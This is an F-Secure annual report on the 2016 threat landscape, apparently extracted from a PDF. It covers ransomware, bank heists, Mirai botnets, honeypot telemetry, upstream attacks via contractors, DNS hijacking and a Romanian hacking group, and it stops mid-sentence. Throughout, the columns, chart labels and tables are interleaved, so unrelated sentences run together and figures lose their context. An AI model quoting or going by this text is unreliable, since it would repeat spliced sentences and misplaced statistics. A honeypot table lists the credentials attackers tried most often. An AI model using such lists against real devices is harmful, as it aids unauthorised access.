Académique Documents
Professionnel Documents
Culture Documents
State of
cyber
security
Punched
in the mouth
A BIG PART of cyber security is being prepared.
You want to do as much as you can to prevent
attackers from breaching your network. Defenders
have all kinds of ways to make this work. They have
firewalls. They have endpoint protection. They have
password managers. They have security training and
information resources. And they have all of these right
at their fingertips.
What defenders need more of, however, are solutions
for when plans fail. Plans fail because what defenders
keep ignoring is that there are people behind every
cyber threat. Those people are 100% focused on
getting around prevention mechanisms to hit their
targets. And one of them will always find a way
through.
Take passwords for example. Storing them in a password
manager seems like the perfect way to address the
problem of having too many long, unique passwords
to remember. When you need a password, you simply
click an empty field to fill in your credentials, or copy
and paste them from your password manager to your
browser. And it works great. Until you get distracted,
accidentally copy your password into a Tweet, and hit
Send. Well, guess what? Attackers use Twitter. If they
follow you or stumble across your Tweet, they can use
Page 2
Punched in the mouth
it to hit you. And if that password happens to get them What happens if were hit? They need to start asking and bad. Were still playing catch-up when it comes to
into your Facebook or Gmail accountits game over. What happens WHEN were hit? What happens WHEN the Internet. Wed be smart to get ahead of the curve
This is one way attackers throw the technologies we our plans fail? for the IoT.
all depend on back in our faces. The Internet is an How do you pick up the pieces? How do you move Nobody can fix every flaw, vulnerability, or weakness.
information tracking, storing, and sharing machine. on? How do you take your data, your accounts, and But we can learn to roll with the punches and make
Its capability goes beyond anything else weve seen your livelihood back from attackers and get it under them a little less painful when they hit.
in history. For the most part, its brought more good your control again?
than bad. But its security implications have yet to sink Regulations rarely hold answers. But the General Data
in. Protection Regulation coming into effect in 2018 will
MIKKO HYPPNEN TOMI TUOMINEN
People say they understand the Internet, and maybe help many European companies start asking the right Chief Research Officer Practice Leader
in a technical sense they do. But most users are in the questions. And while were generally very skeptical @mikko @tomituominen
dark when it comes to grasping the significance of of how much can be accomplished with regulations
technologies that log and track everything. Very few and directives, it might be worth introducing security
people fully comprehend the fact that their data isnt standards for Internet of Things (IoT) devices.
going to disappear. So defenders need to protect it. Many IoT device vendors have little to no experience
And that protection cannot depend completely on in building internet-connected devices. They build IoT
the idea that security plans no matter how good devices to be cheap and to work, but not to be secure.
they are are foolproof. We dont believe this will change without either
Individuals, companies, and even governments were consumers demanding it, or governments enforcing
compromised in 2016. We all saw them bleeding in the it. The IoT has the same transformative potential as
news. Now is the time for defenders to stop asking the World Wide Web, and this potential is both good
Page 3
FOREWORD:
PUNCHED IN THE MOUTH 2 CONTENTS
Share
A big part of cyber security is being prepared. report
What defenders need more of are solutions for
when plans fail.
INTRO: REVERSE-ENGINEERING
THE NUMBERS
The Internet is vast and complicated.
5
This report covers the trends revealed in
LOOKING BACK
6 analyses of telemetry data gathered from
F-Secure products and third-party resources.
7 2016 in review 8
48
Hack the
US elections TODAYS APTS
2016 IN A NUTSHELL 11 ARE TOMORROWS
2016
IS MIRAI THE FUTURE OF THE IOT?
35 OPPORTUNISTS
51
Apr
NOTABLE Nan Hai Shu 49
EVENTS attack BEYOND
the banks THE INSECURE 36 FICORA 38 THE NATION STATE
HOME SECURITY Responding to a Mirai
Shipping <1 %
SYSTEM outbreak in Finland
Jun
Aviation 1 %
BUG
Feb
Governmental 6%
Aug
World Insurance
leading 36%
40
brands
Jan
8%
13
Online
So Many Vulnerabilities, 14 Exploit kit trends 55
56
Oct
gaming
10% So Little Time NOTABLE
CYBER SECURITY MALWARE
SERVICES Whos after who? 16 THE RANSOMWARE TUBE MAP AV-TEST 2016
41
locky
57
CUSTOMER
Other Security facts ransomware
Dec
SEGMENTS
12%
at a glance MACRO
malware
The weakest link 20 2014 cerber
2012
2013
2015
2017
Service Mobile OS takeup 60 petya
providers
SELL at a glance
2016
18%
24
banking-t
CYBER CRIME STORIES
hancitor donoff
Nov
The Bitcoin dilemma 42 Bitcoin friction 45
Smart business with
DNS hijacking
25
THE 31
is ransomwares
only constraint
LOOKING FORWARD
62
Sep
CONSEQUENCES Crime with a 43 47 Why theres no S in IoT 63
OF CYBER CRIME VIRUS BULLETIN
The Romanian 27 customer mindset What we are doing right
Underground Beyond the horizon 65
Jul
Cyber-sleuthing: 29 Cyber crime 33
Connecting the dots marketing 101
APPENDICES Honeypot Intel 68 NCSC-FIs Mirai Mitigation 71 Mirai source code analysis 73
May
Mar
F-SECURE
INTRO
State OF
Reverse Engineering Cyber
the Numbers Security
2017
WHATS the biggest online shopping day of the province over all their customer data, our telemetry
year? extracts significant amounts of anonymous yet
If you live in Western Europe or the United States, relevant data. You can Google F-Secure world map
youd probably say Cyber Monday, the first weekday to see a sample visualization of the data we collect
following Black Friday, which has become the unofficial from the majority of countries around the world. We
launch of the holiday shopping season. supplement our collection with data mining from
several third-party resources, including spam traps
If you live in China, you likely know the answer is and services like VirusTotal, to extrapolate numbers
actually 11 November Singles Day. Alibaba the that are representative of the most relevant trends.
massive Chinese online retailer adopted the day
on which young Chinese people celebrate their This report offers raw numbers when possible and
independence as a marketing hook and sparked a percentages when necessary, given the limitations
sales bonanza. In 2016, Alibabas 11.11 Global Shopping on the information we collect due to terms and
Festival generated $20 billion in sales, dwarfing the $3 conditions on various products.
billion retailers take in on Cyber Monday. Though the No one source can offer a comprehensive picture of
site has been aiming to take Singles Day global since how every threat operates all over the world. Thats
2014, theres a decent chance youve never heard of it. not how threats work. Thats not how the Internet
We offer this example as a frame of reference. The works in a world where many online giants have no
Internet is so massive that trying to measure it is a bit presence at all in some parts of the world and many
like the parable of the blind men and the elephant. threats are polymorphic, offering geographically
You could grab one part and think the whole thing is specific payloads.
made of tusk. In this report, we refer in general to the Internet
Fortunately, from our millions of users and which is the Internet from our point of view. If youre
partnerships with more than 200 Internet Service reading this report, its probably your point of view,
Providers who connect ten millions of users around too.
the globe, we have the ability to get a sense of the We hope you enjoy it. If youre looking for more
whole body. While our partners have exclusive background about the data in the report, feel free to
contact us.
Page 5
LOOKING BACK
2016 NOTABLE EVENTS 7 2016 IN A NUTSHELL 11
law & order
Hack the
US elections
data password
attack releases dumps
the banks
2016 IN REVIEW 8
Cyber security has, in the past, been academic. For most people, anything
that involves cyber security basically, anything related to protecting data
or devices was just a box to tick at work. The laymans perception of it was:
whatever, it doesnt really matter in the real world.
That changed in 2016. This was the year when cyber security stopped being
ephemeral and started being all too real.
Share
report
2016 notable events
APR JUN JUL JUL NOV NOV DEC
EU: GDPR Russia: Big Privacy Shield EU: NIS China: Cyber UK: Snoopers US: Rule 41
data security Brother bill replaces Safe Directive security charter bill mass hacking
law passed passed Harbor adopted law passed passed change
law &
order
FEB APR MAY JUL SEP NOV DEC
Apple fights FBI FBI bought EU expands Microsoft fights Germany blocks Thai govt to Web giants to
order to unlock iPhone exploit Europol powers US overseas data Facebook collecting increase online identify,remove
terrorist phone from hackers to track criminals warrant Whatsapp user data monitoring terror content
attack
$ FEB
Bangladesh More banks
MAY
ATMs in
JUL
SWIFT: More
AUG OCT
Odinaff hacker
NOV NOV
DDoS attacks Cobalt hacker Tesco Bank
NOV
Bank loses $80M raided via Taiwan hacked banks report gang targets banks on Russian gang targets hack affects
the banks in cyber heist SWIFT network to spew money hack attempts via SWIFT network banks ATMs 20K accounts
Apple
Tumblr iPhon
FBI Banglade
SWIFTGDPR SSM
CYBER SECURITY has, in the past, been
academic. For most people, anything that involves
cyber security basically, anything related to
protecting data or devices was just a box to tick at
demanded rather than lose the data taken hostage.
Others chose not to, but were forced to scramble or
fall back to slower processes (some of the hospitals
reportedly went back to pen and paper) while their
Exploit
Linkedin
Banks macr 2016
Myspac
work. The laymans perception of it was: whatever, it systems were disinfected.
doesnt really matter in the real world.
That changed in 2016. This was the year when cyber
Mega-breaches
DNC Turkey Chin
security stopped being ephemeral and started being
all too real. This was the year when many of the events
uncomfortable questions, for themselves and their
Big
For businesses, failing to protect data can also lead to
brother
Panama
clients. In April, over 11 million documents from the
Europo b
Taiwan
reported by mainstream media were essentially
VK ATM
Panama-based offshore law firm Mossack Fonseca were
about data, at every level from intensely personal to
End-to-en
anonymously shared with an international coalition
international. This was the year when failing to protect
Encryption
of investigative journalists. The papers detailed the
data impacted everything from personal finances to
financial dealings of some of the worlds top politicians
mega-corporation deals to elections.
Ransomware everywhere NSA
and celebrities, including prominent figures in Russia,
the United Kingdom, Egypt, Iceland, and China. Dropbox
Guccifer
On a personal level, ransomware was the most visible This quickly became known as the Panama Papers leak,
Microsoft
Ransomw
VW
NIS IOT
Rambler
and direct threat to users in 2016. By seeking out and and led to public protests, one elected official stepping
hijacking control of a users files, then demanding
payment for their return, ransomware drove home the
down from public office (Icelands Prime Minister
Sigmundur Dav Gunnlaugsson), and investigations
Botnet tesla
point that in todays world, data means money. of individuals in multiple countries by the relevant tax
Ransomware also directly impacted organizations authorities based on the records revealed.
Yahoo! Odinaf
Facebo
that provided vital real-world services: small local While the Panama Papers leak would in any other year be
businesses, hospitals, universities, local government considered massive, Yahoo announced in September Wada
Election Mira
services, mass transportation networks, etc. Some that a data breach which had taken place in 2014 had
of the affected targets chose to pay the ransom compromised over 500 million webmail accounts. In Clinton
DDOS DMC
DYNDNS
Page 8
Phish
2016 In review
2016 is also the year when
failing to protect data may
actually have swung an
December, Yahoo again announced a data breach, Grizzly Steppe report jointly released in December by election
a separate incident that apparently occurred in 2013 the Department of Homeland Security and the Federal
and affected 1 billion users. This effectively gave the Bureau of Investigation (FBI) sought to document
web giant the unenviable distinction of suffering the proof of these allegations. In a retaliatory response, Pictures in 2014. The hack was attributed to North
largest data breach in history. President Obama expelled 35 Russian diplomats from Korea, which has been under heavy international
Yahoo attributed the first breach to a state-sponsored the US and imposed sanctions on a number of other sanctions for years. If the bank attacks can also be
attacker, though questions remain about the Russian individuals and organizations. Russia, which conclusively attributed to North Korea, it would be
attribution. Questions also hang over the full extent denied the allegations, unexpectedly refrained from the first known instance of a state using cyber attacks
of both breaches, the timing of the announcements, the usual tit-for-tat diplomatic action and instead said to gain funds.
and the potential impact of the incidents on the deal it would wait for incoming president-elect Trumps
between Yahoo and Verizon, which had agreed to administration to see what would happen. Rise of the IoT botnets
acquire the web firms core properties for $4.83 billion While targeted infiltrations and thefts such as the bank
Attack the banks hacks usually affect only a handful of people, 2016 also
in July, but had not yet closed the deal.
Much like political establishments, the global financial saw the rise of Internet of Things (IoT) botnets and
Election shenanigans system has always been a popular target for attack, their use in launching Distributed Denial of Service
2016 is also the year when failing to protect data and 2016 saw a new form of attack emerge. In May, the (DDoS) attacks that can directly affect thousands, or
may actually have swung an election. It is probably central bank of Bangladesh was forced to announce even millions of users.
impossible to realistically measure the impact of the that it had suffered a loss of $81 million. Hackers
had managed to steal the banks credentials and DDoS attacks have always been an occasional
email server controversy that afflicted the Democratic nuisance, but the explosion of internet-connected
candidates campaign during the United States issue fraudulent instructions over the SWIFT global
bank messaging network to transfer funds from the devices with poor or no device security means that
presidential elections, but theres no dispute that any individual with basic computing knowledge and a
it did influence some voters. It is certainly the first banks account with the New York Federal Reserve to
accounts in Sri Lanka and the Philippines. grudge can now use easily available tools to create a
time that the future of an entire nation, and really of botnet with a colossal amount of computing power.
most of the world, was affected by an unfortunate IT It later emerged that the Bangladesh bank heist
administrative decision. was only one of a series of attacks, with reports of The first notable instance of this was the October attack
banks in Vietnam, Ecuador, and the Philippines being on security researcher Brian Krebs KrebsOnSecurity
The 2016 US presidential elections were remarkable in website, which was hit with traffic that peaked at
many ways, not least for allegations of direct hacking targeted. The attacks essentially used weaknesses in
an individual banks cyber security to commit financial 620gbps, nearly double the next largest such attack.
by Russia. In July, emails from the Democratic National This was swiftly followed by an attack on the Dyn DNS
Convention (DNC) were published on WikiLeaks. In fraud affecting other banks within the same network.
service, which lead to disruptions in web traffic to
October, the US intelligence community publicly While the average customer wasnt directly affected by multiple major websites, including Twitter, Amazon,
announced that it believed Russia had been behind the attacks, they raised fears about trust in the global Tumblr, Reddit, Spotify, and Netflix.
the DNC hack, and had pursued other operations to banking system and bank solvency. Some security
introduce uncertainty and influence the elections in researchers also highlighted similarities between the These attacks were attributed to a botnet coined
favor of the Republican candidate; the underwhelming bank attacks and the hack of Sony Entertainment Mirai. In November, the source code for the botnet
Page 9
2016 In review
In 2016, user data and its
transmission over the Internet
came under increasing state
scrutiny
was released online, and other hackers quickly began While users who dont live in these countries might questions remain about the boundaries for state
creating their own versions of the botnet using the consider these legal changes completely irrelevant, access to user data.
released code. Soon after, banks in Russia announced their data may still be affected. Data today isnt As such, perhaps the most direct and immediate
that their web portals had been briefly disrupted by confined by national borders. Global tech companies improvement in cyber security to take place in 2016
DDoS attacks launched by these new botnets, while such as Google or Apple are now effectively was the unexpected move by WhatsApp Messenger
customers of the Deutsche Telekom, Post Office, and international custodians of their users information, to introduce default end-to-end encryption for its
Talk Talk ISPs in the UK and Germany found that their and have increasingly been pushing back against state popular messaging app. This form of encryption
routers had been infected by Mirai variants. demands for access to it. means that the company itself cannot see or provide
State versus private data versus tech firms The most visible example of the tension between the the content of messages sent over its network. This
companies holding user data and state authorities was simple and effective change provided better data
In 2016, user data and its transmission over the
the legal battle in the first half of 2016 between the FBI security and privacy for over 1 billion users around the
Internet also came under increasing state scrutiny.
and Apple over demands that the tech firm help them world, including many in countries where privacy or
Many countries are either considering or have passed
break the encryption on an iPhone belonging to one human rights are less highly regarded.
legislation that would effectively grant the state greater
of the 2015 San Bernardino terrorists. The courtroom
access to users communications. This includes the
battle came to an unexpected end when the FBI was
Investigatory Powers Act 2016 in the United Kingdom
able to access the device without assistance from
(aka the Snoopers Charter); the amendment to the
Apple, after they reportedly purchased an exploit
Rule 41 Search and Seizure law in the United States;
from a third party. While the court case has ended,
the Yarovaya package anti-terrorism bill (aka the Big
Brother bill) in Russia; and so on.
Page 10
2016 IN A NUTSHELL
RANSOMWARE ENCRYPTION DEBATE BANKS ATTACKED
GOES MAINSTREAM FROM WITHIN
We need to
protect our data!
We accept We need to
know what people are
talking about!
I voted!
f-secure.com
SIZING UP
ATTACK SURFACES SO MANY VULNERABILITIES,
SO LITTLE TIME
14
From a companys point of view, handling
high-severity vulnerabilities is a number one
CYBER SECURITY 13 priority. And they get handled in well run
When non-technical people picture a cyber attack, SERVICES CUSTOMER organizations. High-severity vulnerabilities
they most likely conjure up an image of a hacker in SEGMENTS get a lot of visibility, and because if this, theyre
a hoodie sitting in a basement, or a bespectacled patched on the spot.
military nerd in a command center halfway across But vulnerabilities alone dont make up your
the globe. While this sort of scenario could be true companys entire attack surface. Your CISO
is probably more worried about phishing
(at least the halfway around the globe part), some Shipping <1 %
and upstream attacks than internal network
Aviation 1 %
of the more sophisticated cyber attacks and crimes Governmental 6% misconfigurations and unpatched internal
that were carried out during 2016 involved the use systems.
of physical intrusions. Physical intrusions tend not to
be publicized all that often, and hence most people
arent aware of them, except for things like device Financial &
theft or ATM skimmers. World Insurance
A physical intrusion is a very effective way to carry
leading
brands
8%
36% WHOS AFTER WHO? 16
out a targeted attack against a company or individual.
Since people are usually not on the lookout for the F-Secure researchers employ a global network of honeypots
to help monitor the online threat landscape. While there are
telltale signs of physical breaches, theyre alarmingly Online limitations to what honeypots can tell us, they are an excellent
easy to carry out and tend to go undiscovered for a gaming source of information regarding high-level patterns and trends,
long time. 10%
such as how attackers, self-replicating botnets, and other
sources find targets.
Our own Cyber Security Services teams carry out
physical attacks as part of the threat assessment
projects we run with customers. Their anecdotes Other
are both fascinating and eye-opening. Theyre often
funny too. While the authors were drafting this
12%
THE WEAKEST LINK 20
report, a CSS consultant shared an anecdote about
how theyd infiltrated a network closet at a customer
site and installed some malicious devices, only to Most companies rely onSerexternal
vice contractors, partners, and suppliers to get
return a few weeks later and find that someone had business done. Wevepro viders
observed that in many cases, the security practices of
18%
third parties are overlooked when this sort of integration takes place.
neatly tidied them up on the shelf. Its amazing how
much theyre able to get away with, in plain sight. Every third party you work with has the potential to increase your attack
surface. This can lead to opportunistic or targeted attacks. Any breach that
involves an attacker pivoting into your network via a third party can be
defined as an upstream attack.
Share
report
Cyber Security services Customer segments
Financial &
World Insurance
leading 44%
brands
8%
Online
gaming
10%
Other
12%
Service
providers
18%
Page 13
So Many Vulnerabilities, Taking time out of their
day to understand the
implications of every
THERES WAY TOO MUCH hype about zero day vulnerabilities. The
website, CVE Details, shows an average vulnerability score of 6.8, across all known
vulnerabilities, on all known platforms. Of the over 80,000 known vulnerabilities
impact in their database, 12,000 (almost 15%) of them are classified as high-severity.
Remember, though, that these vulnerabilities exist over plenty of different client
and server-side applications (including, you guessed it, Adobe Flash).
From a companys point of view, handling high-severity vulnerabilities is a number
one priority. And they get handled in well run organizations. High-severity
vulnerabilities get a lot of visibility, and because if this, theyre patched on the spot.
traversal But vulnerabilities alone dont make up your companys entire attack surface. Your
CISO is probably more worried about phishing and upstream attacks than internal
network misconfigurations and unpatched internal systems.
As an IT admin, taking care of infrastructure is your biggest concern. Of course,
youre going to perform triage when a new high-severity vulnerability surfaces. But
breach what about the rest of them? Applying every patch to every piece of software on
every system on your network, as the patch is released, is just not feasible. Thats
why admins rely on periodic patch cycles to fix low severity vulnerabilities, if they
do at all.
Taking time out of their day to understand the implications of every newfound
reconnaissance vulnerability out there is too much ask for most IT admins. And so, in many cases
Page 15
With Russia being the largest
Top source countries for attacks on the Top target countries for attacks on the
Active reconnaissance involves hackers US was the most frequent target of honeypot network honeypot network
using techniques like port scanning both global and Russian traffic. Traffic
to probe devices and networks. This originating from Chinese IPs provided
probing allows them to collect specific a few notable exceptions to this trend:
Page 16
Whos After Who?
Nearly half of the traffic
observed by our honeypots was
looking for exposed http/https
ports
the US and Germany were both the most frequent phishing campaigns, and more. A portion of the traffic
source and destination for reconnaissance traffic to observed by our honeypots is most likely the result
and from China. of automated scanning and self-replicating botnets.
It is very common for attacks to be conducted What are they looking for?
through proxies. There are many different ways root root
Nearly half of the traffic observed by our honeypots
attackers all over the world can leverage proxies to admin support
was looking for exposed http/https ports. Attackers user 111111
help them conduct attacks. For example, attackers
probe these ports in an attempt to look for vulnerable test admin
can compromise a machine (such as by infecting a
software that can be exploited in order to upload ubnt 12345
computer with malware) and then use it to conduct DUP root password
malware or otherwise compromise the device. Even
scans looking for additional targets. Worms, bots, and pi 123456
though the honeypots were clearly not high-value
other types of malware programmed to automatically guest 1234
targets, nor capable of being owned in the way 123321 123
begin scanning for new targets after infecting a
that an actual vulnerable device could, they attract support 1
particular device are often spread in this fashion. ubnt
interest from attackers looking to leverage vulnerable 1234
The more prominently countries appear in these oracle raspberry
machines as proxies for further attacks.
mysql user
observations, the more likely it is that there are
SMTP ports were another popular target. Again, nagios pass
compromised networks or infrastructure (such as ftp any
attackers probe these ports looking for exploitable
bulletproof hosting services) used by attackers postgres welc0me
software. These ports are also frequently targeted
located in the same country or somewhere else in 12345 default
by spam and phishing campaigns, putting them in tomcat synopass
the world. The use of proxies to transcend national
the line of fire for a wide variety of scams used by ubuntu test
borders makes law enforcement and other efforts to
opportunistic cyber criminals. 111111 alpine
combat abuse more difficult, essentially hardening 0 1,2 M 0 300 k
criminal enterprises against takedown attempts. Ports used for more specific purposes, such as Most used user IDs in Most used passwords in
Telnet and SSDP, were also targeted by the traffic we attacks on honeypots attacks on honeypots
Automating active reconnaissance allows attackers
observed. Telnet and SSDP are both easy targets for
to effectively scale their operations and grow their
attackers looking to hijack devices and have both
infrastructure. Such expansion can help attackers
been associated with DDoS-related botnets, so its no
develop their capabilities by giving them what they
surprise that leaving them open was enough to attract
need to perform DDoS attacks, conduct spam/
attention.
Page 17
Whos After Who?
Page 18
F-SECURE
State OF
Whos After Who? Cyber
Security
2017
277 2009
26976 62
208 209
Page 19
The Weakest Link Every third-party you work with
has the potential to increase your
attack surface
MOST COMPANIES rely on external to upstream attacks, and its extremely difficult to Service provider
contractors, partners, and suppliers to get business cover every possible scenario. Here we present you
done. As these business partnerships evolve, its not with a few examples of upstream attack vectors that
uncommon for systems and processes on both sides we saw in the field last year.
to be integrated together. Weve observed that in
many cases, the security practices of third parties are Facilities services
overlooked when this sort of integration takes place. Companies that provide on-site facilities services, such
as garbage collection, cleaning, physical security, and
There are many reasons for this. Requiring partners to
maintenance, get physical access to their customers
tighten their security practices, if at all possible, slows
1
premises as part of their work. This access can include
business down. Teams and individuals tasked with
ID badges, keycards, door codes, and maps of the
arranging business partnerships often arent security-
buildings.
... manage
minded. And when IT departments start integrating
Use to ...
systems, they are often pressured to just get things Were all familiar with the fact that, more often than
done, and end up having to cut corners. not, cyber attacks originate from different geographic
locations than the target theyre attacking. However,
Every third party you work with has the potential
when considering methodically planned, targeted
to increase your attack surface. This can lead to
attacks, adversaries looking to infiltrate an organization
opportunistic attacks (your partner gets breached
may be willing to go as far as to gain physical access
and the attacker finds a way into your own systems) or
to their targets premises. In such cases, the attacker
targeted attacks (the attacker researches companies
may turn to facilities service providers to obtain that
youre partnered with and finds a way into your
access. Indeed, the act of obtaining physical access
network via one of their systems). Any breach that
to an office as part of a targeted attack is something
involves an attacker pivoting into your network via a
our incident response teams saw happening in Europe
third party can be defined as an upstream attack.
during 2016.
Exposure points in your attack surface can wildly vary
Facilities services companies are often quite low-tech.
based on the type of third party youre doing business Company
For instance, its not uncommon for them to keep
with. Theres a lot of room for creativity when it comes
Page 20
The Weakest Link
In a now classic example of an
upstream attack involving a
facilities provider, Target was
breached in 2013
relevant documents on an open-access file share that access controls is often very old, and written without
Service provider workers access to download and print instructions security in mind. Its not uncommon for such systems
before they leave on assignment. The insecure to be accessed over Telnet or VNC, and sometimes
methodologies employed by-and-large by facilities with no authentication. You can find plenty of this
service providers are ripe for the picking, should an stuff with Shodan.
adversary choose to make a physical breach part of In a now classic example of an upstream attack
their attack. involving a facilities provider, Target was breached in
Our CSS consultants are ever weary of upstream 2013 via a system designed to monitor and control air
attacks, targeting a primary target via a third-party, conditioning hardware. The machine in question was
and they know from their own red teaming gigs that accessible from the Internet and had connectivity with
tactics such as imitating a carpet cleaning company Targets retail operations. Attackers easily owned the
2
will gain them access to many physical locations. air conditioning monitor. From there, they were able
Information relevant to gaining physical access to to pivot onto Targets network, and then onto Targets
offices or homes can also be of value to criminals. point-of-sales systems.
Hack & Infect
Page 21
The Weakest Link
The recruitment process is
fraught with danger from both
spear phishing threats and
crimeware
vulnerable plugins). And finally, any of the customers It goes without saying that the recruitment process is
networks can be breached, giving an attacker access Service provider fraught with danger from both spear phishing threats
to the web server and, from there, all of the other and crimeware.
interfaced systems. These types of systems have large
attack surfaces and are tempting targets for potential Consultants
adversaries. Many companies source external staff, in the form of
contractors and consultants. Companies that provide
Recruitment agencies are also at high risk due to
consulting and outsourcing services invariably
the type of content they deal with on a daily basis.
maintain their own security policies (regarding
Recruitment agencies deal with job applications, in the
endpoint protection, hardening, document handling,
form of PDFs and Microsoft Word documents, which
and security awareness guidelines), which are
constantly arrive from unsolicited sources. These
guaranteed to differ from the policies defined by their
3
document types are extremely common infection
client companies.
vectors.
Several high-profile cases over the last few years have
Furthermore, recruitment agencies often run their
illustrated the fact that employees of external services
Infect
own applicant database systems that are in-sourced
can pose a credible insider risk to an organization.
by customers. A recruiter receiving a malicious CV
might unknowingly upload it to their system, where Consultants receive limited or full access to corporate
it is then accessed by dozens of customers (from networks and resources, often via workstations
within their own company networks). All the attacker or laptops that often havent been issued and
needs to do is bypass any security or AV product the configured by the organization they are consulting
recruitment agency is using in order to spread the for. Many companies bring in consultants to set up
malicious document further. or maintain financial systems. Software engineers are
also commonly outsourced, and these consultants
Malicious documents are not the only attack vector
gain access to part, or all, of their customers source
in this scenario. Applicants may also link to watering
repositories and version control systems. Its almost
holes from within their CVs or cover letters. In a real-
impossible to carefully monitor a consultants every
world example from late 2016, our Threat Intelligence
move.
team observed several HR departments being targeted
by phishing attacks as part of opportunistically When looking for an ingress point during a targeted
targeted ransomware campaigns against businesses. Company attack, threat actors sometimes turn to the owners of
botnets to rent specific compromised machines that
Page 22
The Weakest Link
Have your employees watch
the 1992 film Sneakers, or the
recently aired TV show Mr.
Robot
are known to be part of the targeted organization. When it comes to on-site staff, provide them with
External contractors widen the net when it comes to equipment that youve set up and configured yourself. Adversary
finding these already compromised systems. They Allow them to access only the systems they need
also widen the net for spear phishing and social to work with, and remove access as soon as theyre
engineering attacks. finished with the assignment. Make sure youre able
If your organization routinely uses contractors and to log their access and the changes they make, and
external personnel, your physical premises could be remember to audit those logs.
more open to social engineering tactics. With so many Be especially aware of legacy systems such as those
different faces coming and going on a daily basis, its used to control machinery or infrastructure. If
easier to fool employees, and an attacker posing as possible, keep these systems isolated and dont give
a consultant might readily be given access to the them access to your corporate network. If youre
4
building, and possibly even secure areas within it. Our giving third parties access to these sort of systems,
CSS consultants use such tactics to great effect when make sure there are proper authentication and audit
performing threat assessments for customers. mechanisms in place, and that they arent open to the
Intrude
Internet.
Final advice
Keep an eye on what is connecting to your corporate
When working with third parties, there are a few things
network and what its trying to access. This is especially
you can do to minimize the risk of upstream attacks.
important if you have a lot of external parties coming
Always be cautious when allowing any external device
and going. Run frequent discovery scans on your
to access your network. Limit access as much as
network, identify unknown systems and services, and
possible. Use tight access controls. If possible, make
shut them down if you find them.
sure external devices are connected to segregated,
controlled networks. Assume the device in question And finally, its always good to teach your employees
is compromised, and treat it as such. to be aware of social engineering practices in the hack
workplace. Teach them with stories and anecdotes.
When bringing in a partner, assess their security
Have them watch the 1992 film Sneakers, or the
practices and, if possible, work with them on
recently aired TV show Mr. Robot. Learning about this
improving areas where theyre lacking. At the very
stuff is fun, and it will engage your staff.
least, ask partners to follow a defined set of basic
policies and practices. Where possible, audit their
systems yourself. Company
Page 23
CYBER CRIME Share
STORIES report
DNS Hijacking
DNS HIJACKING represents an appealing DNS
form of attack for criminals. The victims of these
attacks are largely unaware that their systems have Here!
Where?
been compromised, and the attacks themselves
are rather troublesome for security providers to
accurately identify.
Why all the porn ads?
DNS (Domain Name System) hijack attacks fall into DATA
two rough categories - either your computers
DNS settings are changed (by a piece of malicious SERVICE
software or PUA, Potentially Unwanted Application),
or your home routers settings are modified by an or hijack the banking session. Victims can also be What were seeing in the field
attacker (which means that, in most cases, all devices directed toward trojanized social media sites designed Looking through the data in our back end systems,
connecting to the router receive receive bogus to steal login credentials, which can be later used for about 98% of our customer base use their own ISPs
settings pointing to malicious DNS servers). Routers collecting personal information or for identity theft. DNS servers. Of the remaining 2%, half are using
can be hacked either by an attacker guessing the Finally, rogue DNS servers can change the adverts known public DNS servers (such as Google DNS), and
login credentials for the devices admin interface that appear on legitimate websites that the victim the other half use unofficial open DNS servers.
(this is common, since many people dont change visits. These ads can range from being a little more
their default router settings) or via a vulnerability in aggressive (pop-up ads, pop-under ads, and such), Many of the open DNS servers used by that last 1%
the routers software. show content the user wasnt expecting (ads for porn are, according to our analysis, legitimate open DNS
sites, viagra, etc.), or even trick the user into doing servers. We estimate that only 10% - 20% of those
Once the DNS settings have been changed, the
something they shouldnt (pop-ups that claim your users are, in fact, pointed at rogue DNS servers. This
attacker can perform a variety of malicious actions.
machine is infected, that direct you to a site that can leaves us with an estimate that roughly 0.1% - 0.2% of
For example, the victim of a DNS hijack can be directed
fix the issue). our customer base are affected by DNS hijack attacks.
toward a trojanized version of their online banking
Of these, the vast majority come from Windows
service, allowing the criminal to steal credentials
malware/PUA campaigns, and not from router hijacks.
Page 25
Smart Business With DNS Hijacking
The criminals involved in DNS
hijacking appear to be smart
enough to prefer a steady,
silent income over making a
quick buck
Compromised! Legit Legit
DNS SERVICE appear in the victims browser. The attacker then gets
Where? paid when those ads show up on pages the victim is
browsing.
It makes sense if you think about it. If a victim of DNS
Rogue hijacking had money stolen from their bank account,
ads or their social media account started sending malware
DATA to their connections, theyd know about it pretty
quickly and get the situation fixed. The time that the
attacker invested in compromising their device would
Rogue have yielded a possible short-term payout, but now
DNS theres one less device providing a stream of revenue.
In contrast, ad hijacking provides a steady cash flow
Where? Here! for the criminal, and since victims rarely notice whats
happening, they continue to get paid and stay off the
radar.
At the end of the day, the criminals involved in DNS
Campaigns from DNSUnlocker and Looksafe make up guys behind DNS hijacking likely know this and use it hijacking appear to be smart enough to favor a steady,
the largest market share of the hijacks were seeing. to their advantage. silent income over making a quick buck.
Page 26
The Romanian Expect a lot more script kiddies to
OVER THE PAST FEW YEARS, youve probably heard phrases such
as the tactics, techniques, and procedures crafted by highly resourced threat
actors are falling into the hands of less skilled adversaries. Thats long speak for
expect a lot more script kiddies to start pwning your systems. As Dr. Ian Levy
from GCHQ recently pointed out, a lot of the attacks were seeing nowadays arent
Advanced Persistent Threats, theyre simple hacks performed by Adequate
Pernicious Toerags.
Nothing illustrates this phenomenon better than the group weve dubbed The
Romanian Underground. This is a group that our Cyber Security Services colleagues
have had first-hand experience with on a number of occasions while performing
incident response and forensics work.
The Romanian Underground are, simply put, a bunch of IRC chatroom buddies who
decided it would be cool to take up the hobby of hacking. Most of these kids,
upon joining the collective, have little to no Unix skills to speak of. They probably
know about five commands in total. Newcomers are taken under the wing of a
mentor who provides them with simple tools and training to get them started on
their new hobby. These mentors are almost as unskilled as the newcomers - they
probably know about five more Unix commands than their apprentices. But theyve
been in the game for a few weeks already, and have a wealth of experience.
As newcomers learn the ropes (which usually implies that theyve learned to
configure the tools theyve been provided), theyre promoted to mentors, and This is not the Romanian underground youre looking for.
take on their own set of apprentices. This hierarchical model closely resembles
the popular pyramid selling schemes you might have had the misfortune to come
across. Of course, the guys involved in The Romanian Underground arent looking to
become millionaires by selling soap - the pyramid scheme is a form of gamification,
Page 27
The Romanian Underground
Page 28
Cyber-Sleuthing: Many criminals assume
that theyre untouchable by
A new lead hes facing, its obvious that the investigations our possibly due to what many suspect is his botnets
A short while later, our attacker initiated a similar team were involved in were most likely only tied to connection with spying operations in Georgia.
ransom operation in a neighboring Nordic country. the perpetrators extra-curricular activities. As
mentioned earlier, European criminal cases against You cant hide
As it turns out, the CEO of the second organization
happened to be good friends with the CEO of the this attacker were dropped as soon as his location At the end of the day, there really is no anonymity
